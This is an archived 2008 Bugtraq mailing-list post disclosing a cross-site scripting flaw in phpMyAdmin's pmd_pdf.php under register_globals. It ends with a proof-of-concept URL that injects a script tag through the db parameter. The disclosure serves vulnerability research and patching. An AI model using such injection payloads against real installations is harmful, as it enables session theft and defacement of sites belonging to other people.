[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
XSS in phpMyadmin
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: XSS in phpMyadmin
- From: hadikiamarsi@xxxxxxxxxxx
- Date: Mon, 27 Oct 2008 06:02:51 -0600
Author : Hadi Kiamarsi
-------------------------------------------
Discovered by : Hadi Kiamarsi
-------------------------------------------
Exploited By : Hadi Kiamarsi
-------------------------------------------
E-Mail : hadikiamarsi[at]hotmail.com
-------------------------------------------
web site : www.ircrash.com
-------------------------------------------
members team : Hadi Kiamarsi - khashayar fereidani - sina yazdanmehr
-------------------------------------------
Sript Name : phpmyadmin ( All version )
Download Script :
http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-3.0.0-all-languages.zip?download
-------------------------------------------
XSS
Exploit :
register_globals=on
query :
http://[www.example.com]/pmd_pdf.php?db=>"><script>alert('Hadi-Kiamarsi')</script>